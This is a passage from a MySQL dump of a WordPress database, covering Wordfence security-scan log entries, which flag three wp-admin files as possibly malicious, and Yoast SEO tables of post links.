41.31 MB of data so far'),(2546,1629498660.374513,2,'info','Analyzed 2200 files containing 41.7 MB of data so far'),(2547,1629498661.408147,2,'info','Analyzed 2300 files containing 41.95 MB of data so far'),(2548,1629498662.214163,2,'info','Analyzed 2400 files containing 42.08 MB of data so far'),(2549,1629498663.403816,2,'info','Analyzed 2500 files containing 42.2 MB of data so far'),(2550,1629498664.510397,2,'info','Analyzed 2600 files containing 43.14 MB of data so far'),(2551,1629498666.923167,2,'info','Analyzed 2700 files containing 45.25 MB of data so far'),(2552,1629498668.600095,2,'info','Analyzed 2800 files containing 47.77 MB of data so far'),(2553,1629498670.817835,2,'info','Analyzed 2900 files containing 49.27 MB of data so far'),(2554,1629498674.305337,2,'info','Analyzed 3000 files containing 51.21 MB of data so far'),(2555,1629498675.714579,2,'info','Analyzed 3100 files containing 62.79 MB of data so far'),(2556,1629498676.704216,2,'info','Analyzed 3200 files containing 64.22 MB of data so far'),(2557,1629498677.625046,2,'info','Analyzed 3300 files containing 66.69 MB of data so far'),(2558,1629498678.937602,2,'info','Analyzed 3400 files containing 69.42 MB of data so far'),(2559,1629498679.956866,2,'info','Analyzed 3500 files containing 72.59 MB of data so far'),(2560,1629498682.020143,2,'info','Analyzed 3600 files containing 73.82 MB of data so far'),(2561,1629498682.676499,2,'info','Analyzed 3666 files containing 74.95 MB of data.'),(2562,1629498682.678889,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(2563,1629498682.686746,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(2564,1629498683.283962,10,'info','SUM_ENDOK:Scanning for known malware files'),(2565,1629498683.919187,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(2566,1629498683.958715,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(2567,1629498683.995132,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(2568,1629498684.027610,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(2569,1629498685.408019,2,'info','Starting scan of file contents'),(2570,1629498686.210697,2,'info','Scanned contents of 21 additional files at 26.91 per second'),(2571,1629498686.213563,2,'info','Asking Wordfence to check URLs against malware list.'),(2572,1629498686.217494,2,'info','Checking 47 host keys against Wordfence scanning servers.'),(2573,1629498686.826905,2,'info','Done host key check.'),(2574,1629498687.517767,2,'info','Done file contents scan'),(2575,1629498687.539098,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(2576,1629498687.567228,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(2577,1629498687.583373,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(2578,1629498687.604537,10,'info','SUM_ENDBAD:Scanning file contents for infections and vulnerabilities'),(2579,1629498687.633545,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(2580,1629498687.653631,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(2581,1629498687.658764,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(2582,1629498687.686529,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(2583,1629498690.635287,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2584,1629498690.641638,2,'info','Checking 1540 host keys against Wordfence scanning servers.'),(2585,1629498691.233159,2,'info','Done host key check.'),(2586,1629498691.245655,2,'info','Done examining URLs'),(2587,1629498691.311439,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(2588,1629498691.339848,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(2589,1629498691.688276,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(2590,1629498691.717938,10,'info','SUM_START:Scanning for weak passwords'),(2591,1629498691.739973,2,'info','Starting password strength check on 1 user.'),(2592,1629498691.834954,10,'info','SUM_ENDOK:Scanning for weak passwords'),(2593,1629498692.882979,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2594,1629498695.586385,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(2595,1629498695.606308,10,'info','SUM_START:Scanning for admin users not created through WordPress'),(2596,1629498696.233442,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(2597,1629498696.334461,10,'info','SUM_START:Scanning for suspicious site options'),(2598,1629498696.458616,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2599,1629498696.460741,2,'info','Done examining URLs'),(2600,1629498696.505114,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(2601,1629498696.513084,1,'info','-------------------'),(2602,1629498696.515166,2,'info','Wordfence used 8 MB of memory for scan. Server peak memory usage was: 36 MB'),(2603,1629498696.516972,1,'info','Scan Complete. Scanned 3666 files, 5 plugins, 1 themes, 252 posts, 0 comments and 1650 URLs in 1 minute 17 seconds.'),(2604,1629498696.518755,10,'info','SUM_FINAL:Scan complete. You have 11 new issues to fix. See below.'),(2605,1629554692.401746,10,'info','SUM_PREP:Preparing a new scan.'),(2606,1629554692.433560,1,'info','Initiating quick scan'),(2607,1629554692.446901,10,'info','SUM_START:Checking Web Application Firewall status'),(2608,1629554692.448823,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2609,1629554692.464527,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2610,1629554692.504962,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(2611,1629554692.523740,1,'info','-------------------'),(2612,1629554692.547117,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2613,1629554692.549612,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2614,1629554692.552191,10,'info','SUM_FINAL:Scan complete. Congratulations, no new problems found.'),(2615,1629641008.764856,10,'info','SUM_PREP:Preparing a new scan.'),(2616,1629641008.826522,1,'info','Initiating quick scan'),(2617,1629641008.853212,10,'info','SUM_START:Checking Web Application Firewall status'),(2618,1629641008.864832,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2619,1629641008.909170,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2620,1629641008.952788,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(2621,1629641008.980219,1,'info','-------------------'),(2622,1629641009.002236,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 28 MB'),(2623,1629641009.012660,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2624,1629641009.023417,10,'info','SUM_FINAL:Scan complete. Congratulations, no new problems found.'),(2625,1629727416.569638,10,'info','SUM_PREP:Preparing a new scan.'),(2626,1629727416.619026,1,'info','Initiating quick scan'),(2627,1629727416.647173,10,'info','SUM_START:Checking Web Application Firewall status'),(2628,1629727416.658881,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(2629,1629727416.702399,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(2630,1629727416.745165,10,'info','SUM_ENDOK:Scanning for old themes, plugins and core files'),(2631,1629727416.772254,1,'info','-------------------'),(2632,1629727416.794799,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2633,1629727416.806102,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2634,1629727416.817546,10,'info','SUM_FINAL:Scan complete. Congratulations, no new problems found.');
/*!40000 ALTER TABLE `wp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wftrafficrates`
--

DROP TABLE IF EXISTS `wp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wftrafficrates`
--

LOCK TABLES `wp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_seo_links`
--

DROP TABLE IF EXISTS `wp_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`)
) ENGINE=InnoDB AUTO_INCREMENT=184 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_seo_links`
--

LOCK TABLES `wp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wp_yoast_seo_links` VALUES (19,'/',577,0,'internal'),(20,'http://www.westonspirit.org.uk/contact-us',577,585,'internal'),(21,'/',577,0,'internal'),(22,'http://www.naturalenhancement.co.uk/permanent-makeup-training',577,0,'external'),(23,'http://www.westonspirit.org.uk/smiling-all-the-way-to-the-dentist',577,42,'internal'),(24,'http://www.westonspirit.org.uk/putting-the-fun-into-fitness',577,242,'internal'),(25,'http://www.westonspirit.org.uk/staying-off-the-statins',577,215,'internal'),(26,'http://survivingwinter.org.uk/links',577,0,'external'),(60,'https://www.streetpr.co.uk/uk/cambridge',592,0,'external'),(61,'http://googleplusblog.co.uk/branding-essential-success-business',592,0,'external'),(62,'http://tickpc.co.uk/benefits-digital-branding',592,0,'external'),(75,'https://www.clairvoyant.co/tarot/tarot-cards-and-their-meaning',605,0,'external'),(76,'https://hellogiggles.com/lifestyle/why-i-use-tarot/',605,0,'external'),(77,'https://www.smh.com.au/lifestyle/life-and-relationships/how-tarot-cards-became-an-essential-part-of-my-daily-existence-20170612-gwpfuv.html',605,0,'external'),(78,'https://www.hunterfinance.co.uk/',598,0,'external'),(79,'https://www.hunterfinance.co.uk/development-finance-vs-bank/what-to-do-when-the-bank-says-no',598,0,'external'),(80,'https://www.nerdwallet.com/blog/investing/how-to-buy-stocks/',598,0,'external'),(81,'http://www.finra.org/investors/insurance',598,0,'external'),(110,'https://www.mayoclinic.org/healthy-lifestyle/adult-health/expert-answers/third-hand-smoke/faq-20057791',620,0,'external'),(111,'https://rainbowintl.com/blog/how-to-get-smoke-damage-out-of-clothes',620,0,'external'),(112,'https://wickandwireco.com/collections/wick-and-wire-co',620,0,'external'),(121,'https://www.smilemoredentalcare.com/complete-smile',627,0,'external'),(122,'https://www.marieclaire.co.uk/life/health-fitness/dentistry-597634',627,0,'external'),(123,'https://www.raconteur.net/healthcare/why-the-uk-public-need-to-take-dental-health-more-seriously',627,0,'external'),(124,'http://www.westonspirit.org.uk/how-can-a-tarot-card-reading-help-you',627,605,'internal'),(137,'https://www.orthodonticslimited.com/braces/the-5-most-common-types-of-braces/',632,0,'external'),(138,'https://www.marlboroughdentalstudio.co.uk/2017/04/how-discreet-are-invisalign-braces',632,0,'external'),(139,'https://www.carefreedental.com/resources/27-braces/181-10-important-things-to-know-before-you-get-dental-braces',632,0,'external'),(140,'http://braceplace.net/blog/how-long-do-i-have-to-wear-braces/',632,0,'external'),(153,'http://www.westonspirit.org.uk/contact-us',613,585,'internal'),(154,'https://destinationsmile.com/11-benefits-professional-teeth-whitening/',613,0,'external'),(155,'https://dorsetdentalimplants.com/',613,0,'external'),(156,'https://www.webmd.com/beauty/laser-skin-resurfacing#1',613,0,'external'),(176,'/',644,0,'internal'),(177,'https://www.nidcr.nih.gov/health-info/childrens-oral-health/tooth-decay-process',644,0,'external'),(178,'https://www.al-faperio.co.uk/periodontal-disease/periodontal-disease-treatment',644,0,'external'),(179,'http://www.westonspirit.org.uk/37-of-adults-are-concerned-with-their-smile',644,632,'internal'),(180,'https://www.readersdigest.ca/health/healthy-living/10-bad-health-habits-you-can-break/',644,0,'external'),(181,'http://younglivin.org.uk/',644,0,'external'),(182,'http://qualitydent.co.uk/',644,0,'external'),(183,'http://welovewhiteteeth.co.uk/',644,0,'external');
/*!40000 ALTER TABLE `wp_yoast_seo_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_seo_meta`
--

DROP TABLE IF EXISTS `wp_yoast_seo_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_seo_meta` (
  `object_id` bigint(20) unsigned NOT NULL,
  `internal_link_count` int(10) unsigned DEFAULT NULL,
  `incoming_link_count` int(10) unsigned DEFAULT NULL,
  UNIQUE KEY `object_id` (`object_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_seo_meta`
--

LOCK TABLES `wp_yoast_seo_meta` WRITE;
/*!40000 ALTER TABLE `wp_yoast_seo_meta` DISABLE KEYS */;
INSERT INTO `wp_yoast_seo_meta` VALUES (9,0,0),(22,0,0),(42,NULL,1),(74,0,0),(215,NULL,1),(242,NULL,1),(427,0,0),(568,0,0),(569,0,0),(570,0,0),(577,6,0),(584,0,0),(585,0,2),(591,0,0),(592,0,0),(597,0,0),(598,0,0),(605,0,1),(610,0,0),(612,0,0),(613,1,0),(619,0,0),(620,0,0),(626,0,0),(627,1,0),(631,0,0),(632,0,1),(636,0,0),(641,0,0),(642,0,0),(643,0,0),(644,2,0),(648,0,0);
/*!40000 ALTER TABLE `wp_yoast_seo_meta` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-02-01  0:16:52